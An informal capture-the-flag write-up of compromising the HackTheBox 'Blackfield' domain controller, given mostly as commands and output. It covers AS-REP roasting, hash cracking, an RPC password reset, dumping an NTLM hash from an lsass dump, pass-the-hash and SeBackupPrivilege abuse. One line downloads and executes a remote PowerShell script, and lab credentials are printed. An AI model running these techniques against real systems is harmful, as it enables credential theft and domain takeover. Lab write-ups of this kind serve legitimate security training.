> [!caution] >  **Pro-Tip**: Always lookup the write-ups when you have fully tried everything and exhausted your knowledge. Basically, ensure whenever you lookup the write-ups you learn something new, not something like ‘Oh shit, i knew that, i should have tried that’ , you should be like ‘Oh thats new, great to learn this new skill, lets add it up in my arsenal of skills’.- this will eventually build up your skills and you’ll learn many new ones.** > IP address - 10.10.10.192 >> Nmap scan with minrate-1000 to see quick open port **nmap -p- --min-rate 10000 -Pn -oA nmap-alltcp 10.10.10.192** Performing an intense port scan against the open ports we found ```sh ┌──(kali㉿kali)-[~/HTB] └─$ nmap -sV -Pn 10.10.10.192 Starting Nmap 7.92 ( https://nmap.org ) at 2024-01-02 02:39 EST Nmap scan report for 10.10.10.192 Host is up (0.20s latency). Not shown: 993 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-02 15:40:13Z) 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 79.53 seconds ``` ### DNS - TCP/UDP 53 ```sh ┌──(kali㉿kali)-[~/HTB] └─$ dig @10.10.10.192 blackfield.local ; <<>> DiG 9.17.19-3-Debian <<>> @10.10.10.192 blackfield.local ; (1 server found) ;; global options: +cmd ;; Got answer: ;; WARNING: .local is reserved for Multicast DNS ;; You are currently testing what happens when an mDNS query is leaked to DNS ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18455 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4000 ;; QUESTION SECTION: ;blackfield.local. IN A ;; ANSWER SECTION: blackfield.local. 600 IN A 10.10.10.192 ;; Query time: 196 msec ;; SERVER: 10.10.10.192#53(10.10.10.192) (UDP) ;; WHEN: Tue Jan 02 02:48:55 EST 2024 ;; MSG SIZE rcvd: 61 ``` > The zone transfer would list all the known subdomains if it's available. ### LDAP - TCP 389 / 3268 > First, let’s see if we can do an anonymous bind on the LDAP port using ldapsearch ```sh ┌──(kali㉿kali)-[~/HTB] └─$ ldapsearch -x -b "dc=blackfield,dc=local" -H ldap://10.10.10.192 # extended LDIF # # LDAPv3 # base <dc=blackfield,dc=local> with scope subtree # filter: (objectclass=*) # requesting: ALL # # search result search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera tion a successful bind must be completed on the connection., data 0, v4563 # numResponses: 1 ``` > It did not work, or yeah we see a no. > Let's still check what other information I can pull from ldap [like subdomains] ```sh ┌──(kali㉿kali)-[~/tools/impacket-master/examples] └─$ ldapsearch -h 10.10.10.192 -x -b "DC=BLACKFIELD,DC=local" # extended LDIF # # LDAPv3 # base <DC=BLACKFIELD,DC=local> with scope subtree # filter: (objectclass=*) # requesting: ALL # # search result search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera tion a successful bind must be completed on the connection., data 0, v4563 # numResponses: 1 ``` > omoo, make i just try some possible wins, i no sabi which one go drop, but we keep bombing.... :zap: > checking to enumerate any AS-REP roastable users that have pre-authentication disabled ```sh ┌──(kali㉿kali)-[~/tools/impacket-master/examples] └─$ python3 GetNPUsers.py blackfield.local/ -dc-ip 10.10.10.192 Impacket v0.11.0 - Copyright 2023 Fortra [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563 ``` > Testing for NULL access with **rpcclient** and **smbclient** > with rpcclient i was able to login same as smbclient ; hey chill a bit, make i structure am so we fit understand when next we dey read am. No vex my boss :bow: ### SMB - TCP 445 > Using crackmapexec our go to tool when it comes to cheking what OS is running, since it wasn't revealsed to us before ```sh ┌──(kali㉿kali)-[~/tools/impacket-master/examples] └─$ crackmapexec smb 10.10.10.192 SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) ``` #### Null Connection > With no creds, we check to see what we can find, rememeber we tried this to checkfor the quick wins then.. > **RPCCLIENT** ```sh ┌──(kali㉿kali)-[~/tools/impacket-master/examples] └─$ rpcclient 10.10.10.192 -U "" Enter WORKGROUP\'s password: rpcclient $> srvinfo 10.10.10.192 Wk Sv PDC Tim NT platform_id : 500 os version : 10.0 server type : 0x80102b rpcclient $> querydominfo result was NT_STATUS_ACCESS_DENIED rpcclient $> enumdomusers result was NT_STATUS_ACCESS_DENIED rpcclient $> enumdomgroup command not found: enumdomgroup rpcclient $> enumdomgroups result was NT_STATUS_ACCESS_DENIED ``` > This worked, but we are limited to what we can query, lmao next up is > checking smbclient > Now for smblient, there are different ways to perform a NULL connection ```sh ┌──(kali㉿kali)-[~/HTB] └─$ smbclient -L 10.10.10.192 -U "" Enter WORKGROUP\'s password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share forensic Disk Forensic / Audit share. IPC$ IPC Remote IPC NETLOGON Disk Logon server share profiles$ Disk SYSVOL Disk Logon server share OR ┌──(kali㉿kali)-[~/HTB] └─$ smbclient -N -L \\\\10.10.10.192 Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share forensic Disk Forensic / Audit share. IPC$ IPC Remote IPC NETLOGON Disk Logon server share profiles$ Disk SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. Using smbmap ┌──(kali㉿kali)-[~/HTB] └─$ smbmap -H 10.10.10.192 -u null [+] Guest session IP: 10.10.10.192:445 Name: 10.10.10.192 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share forensic NO ACCESS Forensic / Audit share. IPC$ READ ONLY Remote IPC NETLOGON NO ACCESS Logon server share profiles$ READ ONLY SYSVOL NO ACCESS Logon server share ``` > From this we have READ access to profiles$ seems to be a list of users share > connecting to the share ```sh ┌──(kali㉿kali)-[~/HTB] └─$ smbclient -N //10.10.10.192/profiles$ Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jun 3 12:47:12 2020 .. D 0 Wed Jun 3 12:47:12 2020 AAlleni D 0 Wed Jun 3 12:47:11 2020 ABarteski D 0 Wed Jun 3 12:47:11 2020 ABekesz D 0 Wed Jun 3 12:47:11 2020 ABenzies D 0 Wed Jun 3 12:47:11 2020 ABiemiller D 0 Wed Jun 3 12:47:11 2020 AChampken D 0 Wed Jun 3 12:47:11 2020 ACheretei D 0 Wed Jun 3 12:47:11 2020 ACsonaki D 0 Wed Jun 3 12:47:11 2020 AHigchens D 0 Wed Jun 3 12:47:11 2020 AJaquemai D 0 Wed Jun 3 12:47:11 2020 AKlado D 0 Wed Jun 3 12:47:11 2020 AKoffenburger D 0 Wed Jun 3 12:47:11 2020 AKollolli D 0 Wed Jun 3 12:47:11 2020 AKruppe D 0 Wed Jun 3 12:47:11 2020 AKubale D 0 Wed Jun 3 12:47:11 2020 ALamerz D 0 Wed Jun 3 12:47:11 2020 ...[snip]... ``` > a lot of directory with nothing inside... are you kidding me; mad oo.. but wait oo, they look like users on the DC. omo, make we create list, life no suppose hard. quick and dirty regex to dump the usernames to a file. You can use chatGPT oo, no allow overthinking injure you :smile: i just learnt about it doign this lab though, so no worry ``` ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ smbclient -N \\\\10.10.10.192\\profiles$ -c dir | sed \$d | grep -oE '([a-zA-Z0-9]{5,})' > blackfield.txt ``` > it worked, i found a blog where we can mount the share share on my local box NB: (just hit enter when prompted for a password): you must be root on your local machine to perform this ```sh ┌──(root💀kali)-[/home/kali/HTB/blackfield] └─# mount -t cifs //10.10.10.192/profiles$ /mnt Password for root@//10.10.10.192/profiles$: # Going to the /mnt directory we see that our share in temporary mounted there and we can file the dorecotries, even though they are empty yh, we can then use that to create our users wordlist. mv users users.old; ls -1 /mnt/ > users ``` > with our wordlist generated, next up is to stay on the safe side for now and try an ASREPRoast attack. just like the forest lab in HTB ## Access as support ### AS-REP Roast -- using impacket-GetNPUsers > As a reminder, **AS-REP roasting** is a technique that **allows retrieving password hashes for users** that have the** Do not require Kerberos preauthentication property selected**. It means that we can recover a hash which can be cracked offline. One of the best tools for the job would be **impacket-GetNPUsers**, which should already be installed on Kali. > Two ways to perfrom this. ```sh # with the username wordlist we got from the shares, we can use that to perform the attack. ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ impacket-GetNPUsers blackfield.local/ -usersfile blackfield.txt -dc-ip 10.10.10.192 [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set ...[snip]... [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) $krb5asrep$23$support@BLACKFIELD.LOCAL:bd69446f63043a4930313aeba01d6255$3f6c2713f18b4a87e0d13a53f9dfac46b44e5cb8cfe489704ff34be2d1f7efa56afb1843830ace9a12a69f1380578045a407a6bccf7a22f40c4c1807a4f83bd74be4d09ba7aeddf3b327585bb383cbf8ef68ee58362813a526d89109fccc993ee0292b7723e74dbc879e1a2ea3da008866b408166676b6f0953b56c94d48d615b0b79c4f1385dd608ca4e9385360af97940d29d356441bf6c4836854c90a44854e2ef11558b20d2c899cb52bb188c7973df6cae91ac567bc2f5627ac0ad350997becbca8b0918d32ed0d3014a4e6ae1d742ccd8b4df5b3fac87aefd65eb8d07738b0f9d11f3f8f88c6c42859381ee8e8a355b4ce # OR we can use a oneliner to perform this attack. ``` > Nice, we do have a hash for the support user. If the user is using a weak password, we may be able to recover it. ### Crack Hash ```sh Now, we just have to copy/paste the recovered hash in a file and try to crack it offline using the rockyou password list # There are two ways to perform this, using john or hashcat ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ john hash.txt -w=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status #00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL) --password here :XD 1g 0:00:02:34 DONE (2024-01-02 04:36) 0.006481g/s 92915p/s 92915c/s 92915C/s #13Carlyn..#*burberry#*1990 Use the "--show" option to display all of the cracked passwords reliably Session completed. or ``` > Creds: support / **#00^BlackKnight** ### Access Check > With these creds, I’ll see what kind of access I just acquired. omo, support does not have WinRM access: i'm hungry now.. ```sh -- checking for winrm ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ crackmapexec winrm 10.10.10.192 -u support -p '#00^BlackKnight' WINRM 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local) WINRM 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman WINRM 10.10.10.192 5985 DC01 [-] BLACKFIELD.local\support:#00^BlackKnight -- didn't work for winrm ;then checking for smb, it worked ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight' SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight ``` > checking the file shares on smb using the creds found. ```sh ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight' --shares SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight SMB 10.10.10.192 445 DC01 [+] Enumerated shares SMB 10.10.10.192 445 DC01 Share Permissions Remark SMB 10.10.10.192 445 DC01 ----- ----------- ------ SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin SMB 10.10.10.192 445 DC01 C$ Default share SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share. SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share SMB 10.10.10.192 445 DC01 profiles$ READ SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share ``` >We don't have READ permission to the oter shares aside from the other ones we could see before, nothing new > checking it we can login using smbmap ```sh ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight' [+] IP: 10.10.10.192:445 Name: 10.10.10.192 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share forensic NO ACCESS Forensic / Audit share. IPC$ READ ONLY Remote IPC NETLOGON READ ONLY Logon server share profiles$ READ ONLY SYSVOL READ ONLY Logon server share ``` >The credentials are valid, but we still don’t have any remote shell on the machine. Let’s see if we can get some information about the domain using BloodHound. ## Access as audit2020 Enumeration Failed me ### SMB I connected to each of the three shares: * profiles$ -- all empty. * NETLOGON -- empty. * SYSVOL -- lmao, none of them provided anything useful to me. #### Kerberoasting -- using impacket-GetUserSPNs Now that I have valid domain creds, I tried to Kerberoast, but no tickets came back :crying_cat_face: :crying_cat_face: ```sh ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ impacket-GetUserSPNs -request -dc-ip 10.10.10.192 'blackfield.local/support:#00^BlackKnight' Impacket v0.11.0 - Copyright 2023 Fortra No entries found! ``` ### Active Directory Recon using Bloodhound > Since we have a valid account now, we can now use the BloodHound ingestors and gather more information about the Active Directory. you can download or should i say install **python -m pip install bloodhound** The parameters for **bloodhound-python** took a bit of playing with: * -c ALL - All collection methods * -u support -p #00^BlackKnight - Username and password to auth as * -d blackfield.local - domain name * -dc dc01.blackfield.local - DC name (it won’t let you use an IP here) * -ns 10.10.10.192 - use 10.10.10.192 as the DNS server ```sh ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192 INFO: Found AD domain: blackfield.local INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (blackfield.local:88)] [Errno -2] Name or service not known INFO: Connecting to LDAP server: dc01.blackfield.local INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 18 computers INFO: Connecting to LDAP server: dc01.blackfield.local INFO: Found 316 users INFO: Found 52 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: DC01.BLACKFIELD.local INFO: Done in 01M 15S # or saving it as a zip $ bloodhound-python -c All -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.192 --zip ``` ### Analysis * sudo bloodhound * sudo neo4j console I loaded all the files into Bloodhound. with the cred Once ont he bloodhound dashboard, I uploaded the zip file into the UI  > once uploaded, we can utilize the pre built queries under the analysis tab to find information about the domain  > The most notable query that deserves mention :rolling_on_the_floor_laughing: is the **"Shortest Path to Highh Value Targets"** query *yesss, the oga boss, the king, the lion itself*, which dumped a lot of information  > This shows us information about the svc_backup account, which we aleady enumerated (groups); however, we do not see anything interesting for our current user 'support'. > checking the net query, that is the "Find AS-REP Roastable Users" we then see the 'support' account, then click on the 'suppport' account to extract information about the node  > checking the node info tab it reveals rights / privileges that our current user has. > > checking the **'Under Outbound Control Rights > First Degree Object Control'**, I found that the current user has one particularly interesting priv. The 'support' acount has the ability to change the password of the audit2020 account.  > we can go to the '? Help' page, to check the abue tab, it provides us qith a powerview command that can be used to abuse this priv. But we can't get foothold, lmao, we need to do it remotely ### Changing the 'audit2020' Account's Password ### Password Reset over RPC > There’s a somewhat famous post by Mubix about resetting Windows passwords over RPC. https://room362.com/post/2017/reset-ad-user-password-with-linux/ or https://thehacker.recipes/ad/movement/dacl/forcechangespassword I’ll use the command setuserinfo2: * rpcclient 10.10.10.192 -U "support" * setuserinfo2 audit2020 23 Password123 ```s ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ rpcclient 10.10.10.192 -U "support" Enter WORKGROUP\support's password: rpcclient $> setuserinfo2 Usage: setuserinfo2 username level password [password_expired] result was NT_STATUS_INVALID_PARAMETER rpcclient $> setuserinfo2 audit2020 23 Password123 rpcclient $> exit ``` > We can also check the password policy first before changing it so we know that we met the requirement. that is minimum length of 7 #### A quick one using enum4linux-ng ```sh ┌──(kali㉿kali)-[~/tools/enum4linux-ng] └─$ python3 enum4linux-ng.py -u support -p '#00^BlackKnight' 10.10.10.192 ========================================= | Policies via RPC for 10.10.10.192 | ========================================= [*] Trying port 445/tcp [+] Found policy: Domain password information: Password history length: 24 Minimum password length: 7 Maximum password age: 41 days 23 hours 53 minutes Password properties: - DOMAIN_PASSWORD_COMPLEX: true - DOMAIN_PASSWORD_NO_ANON_CHANGE: false - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false - DOMAIN_PASSWORD_LOCKOUT_ADMINS: false - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false Domain lockout information: Lockout observation window: 30 minutes Lockout duration: 30 minutes Lockout threshold: None Domain logoff information: Force logoff time: not set ``` > Now that the password for the user 'audit2020' has been changed we need to test ou access with the user. > using crackmapexec to see if the password has successfully changed. ### Check Creds ```sh ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ crackmapexec smb 10.10.10.192 -u audit2020 -p Password123 SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Password123 # This proves that the credentials worked # failed with winrm ``` ### Priv Escalation : Audit2020 >> svc_backup > Enumerating the shres with the 'audit2020' account ```sh ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ smbmap -H 10.10.10.192 -u audit2020 -p Password123 [+] IP: 10.10.10.192:445 Name: 10.10.10.192 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share forensic READ ONLY Forensic / Audit share. IPC$ READ ONLY Remote IPC NETLOGON READ ONLY Logon server share profiles$ READ ONLY SYSVOL READ ONLY Logon server share # we get READ permission on the forensic share ``` > Connecting to forensic, there are three folders: ```sh ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ smbclient -U audit2020 //10.10.10.192/forensic Password123 Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun Feb 23 08:03:16 2020 .. D 0 Sun Feb 23 08:03:16 2020 commands_output D 0 Sun Feb 23 13:14:37 2020 memory_analysis D 0 Thu May 28 16:28:33 2020 tools D 0 Sun Feb 23 08:39:08 2020 5102079 blocks of size 4096. 1672162 blocks available smb: \> recurse on smb: \> prompt off smb: \> ls . D 0 Sun Feb 23 08:03:16 2020 .. D 0 Sun Feb 23 08:03:16 2020 commands_output D 0 Sun Feb 23 13:14:37 2020 memory_analysis D 0 Thu May 28 16:28:33 2020 tools D 0 Sun Feb 23 08:39:08 2020 \commands_output . D 0 Sun Feb 23 13:14:37 2020 .. D 0 Sun Feb 23 13:14:37 2020 domain_admins.txt A 528 Sun Feb 23 08:00:19 2020 domain_groups.txt A 962 Sun Feb 23 07:51:52 2020 domain_users.txt A 16454 Fri Feb 28 17:32:17 2020 firewall_rules.txt A 518202 Sun Feb 23 07:53:58 2020 ipconfig.txt A 1782 Sun Feb 23 07:50:28 2020 netstat.txt A 3842 Sun Feb 23 07:51:01 2020 route.txt A 3976 Sun Feb 23 07:53:01 2020 systeminfo.txt A 4550 Sun Feb 23 07:56:59 2020 tasklist.txt A 9990 Sun Feb 23 07:54:29 2020 \memory_analysis . D 0 Thu May 28 16:28:33 2020 .. D 0 Thu May 28 16:28:33 2020 conhost.zip A 37876530 Thu May 28 16:25:36 2020 ctfmon.zip A 24962333 Thu May 28 16:25:45 2020 dfsrs.zip A 23993305 Thu May 28 16:25:54 2020 dllhost.zip A 18366396 Thu May 28 16:26:04 2020 ismserv.zip A 8810157 Thu May 28 16:26:13 2020 lsass.zip A 41936098 Thu May 28 16:25:08 2020 mmc.zip A 64288607 Thu May 28 16:25:25 2020 RuntimeBroker.zip A 13332174 Thu May 28 16:26:24 2020 ServerManager.zip A 131983313 Thu May 28 16:26:49 2020 sihost.zip A 33141744 Thu May 28 16:27:00 2020 smartscreen.zip A 33756344 Thu May 28 16:27:11 2020 svchost.zip A 14408833 Thu May 28 16:27:19 2020 taskhostw.zip A 34631412 Thu May 28 16:27:30 2020 winlogon.zip A 14255089 Thu May 28 16:27:38 2020 wlms.zip A 4067425 Thu May 28 16:27:44 2020 WmiPrvSE.zip A 18303252 Thu May 28 16:27:53 2020 ...[snip]... ``` > the file that stood out after enumeration is the lsass.zip file. ### LSASS Dump ```sh ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ unzip lsass.zip Archive: lsass.zip inflating: lsass.DMP ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ file lsass.DMP lsass.DMP: Mini DuMP crash report, 16 streams, Sun Feb 23 18:02:01 2020, 0x421826 type ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ ls -lh lsass.DMP -rwxrwx--- 1 root vboxsf 137M Feb 23 11:02 lsass.DMP ``` > Using pypykatz https://github.com/skelsec/pypykatz, a mimikatz implementation in Python, we can try to read the content of lsass.DMP and maybe grab some passwords or hashes. > I’ll install it with **pip3 install pypykatz**. https://en.hackndo.com/remote-lsass-dump-passwords/#linux--windows has a good section on dumping with pypykatz from Linux. It dumps a bunch of information: ```sh ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ pypykatz lsa minidump lsass.DMP INFO:root:Parsing file lsass.DMP FILE: ======== lsass.DMP ======= == LogonSession == authentication_id 406458 (633ba) session_id 2 username svc_backup domainname BLACKFIELD logon_server DC01 logon_time 2020-02-23T18:00:03.423728+00:00 sid S-1-5-21-4194615774-2175524697-3563712290-1413 luid 406458 == MSV == Username: svc_backup Domain: BLACKFIELD LM: NA NT: 9658d1d1dcd9250115e2205d9f48400d SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c == WDIGEST [633ba]== username svc_backup domainname BLACKFIELD password None == SSP [633ba]== username domainname password None == Kerberos == Username: svc_backup Domain: BLACKFIELD.LOCAL Password: None == WDIGEST [633ba]== username svc_backup domainname BLACKFIELD password None == LogonSession == authentication_id 365835 (5950b) session_id 2 username UMFD-2 domainname Font Driver Host logon_server logon_time 2020-02-23T17:59:38.218491+00:00 sid S-1-5-96-0-2 ...[snip]... ``` > We have an NTLM hash for svc_backup. Using the recovered hash and crackmapexec we could perform a Pass-the-Hash attack and try to authenticate as svc_backup. >Ok here is it, yh Pass the hash (or PTH) is a method of authenticating as a user without having access to the user’s cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. > since the svc_backup account is in the Remote management user's group, it has the ability to use Winrm to remote into the DC ```sh ┌──(kali㉿kali)-[~/HTB/blackfield/memory_analysis] └─$ crackmapexec winrm 10.10.10.192 -d blackfield.local -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d WINRM 10.10.10.192 5985 10.10.10.192 [*] http://10.10.10.192:5985/wsman WINRM 10.10.10.192 5985 10.10.10.192 [+] blackfield.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!) ``` > Evil-WinRM provides a shell: ```sh ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_backup\Documents> cd .. *Evil-WinRM* PS C:\Users\svc_backup> cd Desktop *Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat user.txt 3920bb317a0bef51027e2852be6**** *Evil-WinRM* PS C:\Users\svc_backup\Desktop> ``` ### Priv: svc_backup –> administrator #### Enumeration ```sh *Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled *Evil-WinRM* PS C:\Users\svc_backup\Desktop> ``` > We do have the SeBackupPrivilege privilege. > checking the group of the svc_backup ```sh *Evil-WinRM* PS C:\Users\svc_backup\Desktop> net user svc_backup User name svc_backup Full Name Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 2/23/2020 9:54:48 AM Password expires Never Password changeable 2/24/2020 9:54:48 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 2/23/2020 10:03:50 AM Logon hours allowed All Local Group Memberships *Backup Operators *Remote Management Use Global Group memberships *Domain Users The command completed successfully. ``` > I see that the user is part of the ***Backup Operators** #### Abusing > The SeBackupPrivilege privilege https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/ is really interesting. It was designed for allowing users to create backup copies of the system. Since it is not possible to make a backup of something that you cannot read. This privilege comes at the cost of providing the user with full read access to the file system. >In a nutshell, it causes the system to grant all read access control to any file (read only). So, we could read the root.txt by abusing this token. >Using a tool called Acl-FullControl.ps1, https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1 we were able to change the access rights of the svc_backup and allow him to read the administrator folder. > setting it up and dowloading it on our remote attack > ***Attacker machine*** ```sh ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ wget https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Acl-FullControl.ps1 --2024-01-02 13:47:23-- https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Acl-FullControl.ps1 Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.110.133, 185.199.111.133, ... Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 953 [text/plain] Saving to: ‘Acl-FullControl.ps1’ Acl-FullControl.ps1 100%[======================================>] 953 --.-KB/s in 0s 2024-01-02 13:47:24 (29.6 MB/s) - ‘Acl-FullControl.ps1’ saved [953/953] ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ python3 -m http.server 80 2 ⨯ Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.192 - - [02/Jan/2024 13:49:08] "GET /Acl-FullControl.ps1 HTTP/1.1" 200 - ``` > ***Remote machine*** ```sh *Evil-WinRM* PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.6/Acl-FullControl.ps1') *Evil-WinRM* PS C:\> ls Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 5/26/2020 5:38 PM PerfLogs d----- 6/3/2020 9:47 AM profiles d-r--- 3/19/2020 11:08 AM Program Files d----- 2/1/2020 11:05 AM Program Files (x86) d-r--- 2/23/2020 9:16 AM Users d----- 9/21/2020 4:29 PM Windows -a---- 2/28/2020 4:36 PM 447 notes.txt *Evil-WinRM* PS C:\> Acl-FullControl -user blackfield\svc_backup -path c:\users\administrator [+] Current permissions: Path : Microsoft.PowerShell.Core\FileSystem::C:\users\administrator Owner : NT AUTHORITY\SYSTEM Group : NT AUTHORITY\SYSTEM Access : NT AUTHORITY\SYSTEM Allow FullControl BUILTIN\Administrators Allow FullControl BLACKFIELD\Administrator Allow FullControl Audit : Sddl : O:SYG:SYD:P(A;OICI;FA;;;SY)(A;OICI;FA;;;BA)(A;OICI;FA;;;LA) [+] Changing permissions to c:\users\administrator [+] Acls changed successfully. Path : Microsoft.PowerShell.Core\FileSystem::C:\users\administrator Owner : NT AUTHORITY\SYSTEM Group : NT AUTHORITY\SYSTEM Access : NT AUTHORITY\SYSTEM Allow FullControl BUILTIN\Administrators Allow FullControl BLACKFIELD\Administrator Allow FullControl BLACKFIELD\svc_backup Allow FullControl Audit : Sddl : 